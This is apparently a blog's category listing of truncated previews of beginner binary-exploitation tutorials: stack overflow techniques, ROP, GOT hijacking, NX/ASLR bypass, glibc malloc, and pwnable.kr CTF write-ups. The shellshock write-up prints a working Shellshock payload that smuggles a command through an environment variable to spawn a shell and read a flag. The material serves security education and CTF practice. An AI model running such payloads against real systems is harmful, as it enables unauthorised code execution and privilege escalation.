
【pwn】
Pz_mstr
混子程序员
展开
-
栈溢出学习(五)之NX,ASLR绕过方法
前言栈溢出学习(五)之NX,ASLR绕过方法,讲述NX,ASLR保护机制及其绕过方法系列文章栈溢出学习(一)之利用预留后门 & return2shellcode栈溢出学习(二)之 jmp esp & return2libc栈溢出学习(三)之简单ROP栈溢出学习(四)之Hijack GOT本文属于新手实验难度,过程比较详细,适合新手学习样例代码本文使用的代码如下...原创 2020-03-29 13:45:02 · 4368 阅读 · 0 评论 -
栈溢出学习(四)之Hijack GOT
前言栈溢出学习(四),讲述Hijack GOT的基本原理及其利用ROPchain实现Hijack GOT的方法系列文章栈溢出学习(一)栈溢出学习(二)栈溢出学习(三)之简单ROP本文属于新手实验难度,过程比较详细,适合新手学习样例代码本文使用的代码如下#include <stdio.h>#include <stdlib.h>#include <...原创 2020-03-27 23:16:37 · 1637 阅读 · 1 评论 -
栈溢出学习(三)之简单ROP
前言栈溢出学习(三),针对一个例子,进行各种栈溢出技术的练习。系列文章栈溢出学习(一)栈溢出学习(二)本文属于新手实验难度,过程比较详细,适合新手学习样例代码本文使用的代码如下#include <stdio.h>#include <stdlib.h>#include <string.h>/* * compiled with: * ...原创 2020-03-27 21:53:57 · 1161 阅读 · 1 评论 -
栈溢出学习(二)之 jmp esp & return2libc
前言栈溢出学习(二),针对一个例子,进行各种栈溢出技术的练习。本文内容承接栈溢出学习(一)本文属于新手实验难度,过程比较详细,适合新手学习样例代码本文使用的代码如下#include <stdio.h>#include <stdlib.h>#include <string.h>/* * compiled with: * gcc -...原创 2020-03-22 16:48:41 · 3728 阅读 · 0 评论 -
栈溢出学习(一)之利用预留后门 & return2shellcode
前言栈溢出学习(一),针对一个例子,进行各种栈溢出技术的练习样例代码本文使用的代码如下#include <stdio.h>#include <stdlib.h>#include <string.h>/* * compiled with: * gcc -O0 -fno-stack-protector -no-pie ...原创 2020-03-20 22:06:39 · 1503 阅读 · 3 评论 -
理解 glibc malloc
0x01 前言glibc malloc学习记录参考文章:https://sploitfun.wordpress.com/2015/02/10/understanding-glibc-malloc/0x02 memory allocator 简介每一种memory allocator目标都是fast,scalable and memory efficientmemory alloc...原创 2020-03-04 21:40:35 · 494 阅读 · 0 评论 -
pwnable.kr shellshock wp
0x01 shellshockCVE-2014-6271 attack0x02 principleshttps://blog.csdn.net/qq_27180763/article/details/880491780x03 payloadexport foo='() { :; }; ./bash'./shellshockcat flag0x04 flagshellshock@...原创 2019-12-19 14:50:57 · 225 阅读 · 0 评论 -
pwnable.kr mistake wp
0x01 src#include <stdio.h>#include <fcntl.h>#define PW_LEN 10#define XORKEY 1void xor(char* s, int len){ int i; for(i=0; i<len; i++){ s[i] ^= XORK...原创 2019-12-17 22:02:06 · 188 阅读 · 0 评论 -
pwnable.kr leg wp
0x01 src code#include <stdio.h>#include <fcntl.h>int key1(){ asm("mov r3, pc\n");}int key2(){ asm( "push {r6}\n" "add r6, pc, $1\n" "bx r6\n" ".code 16\n" "mov r3, pc\n" "ad...原创 2019-12-17 21:18:32 · 152 阅读 · 0 评论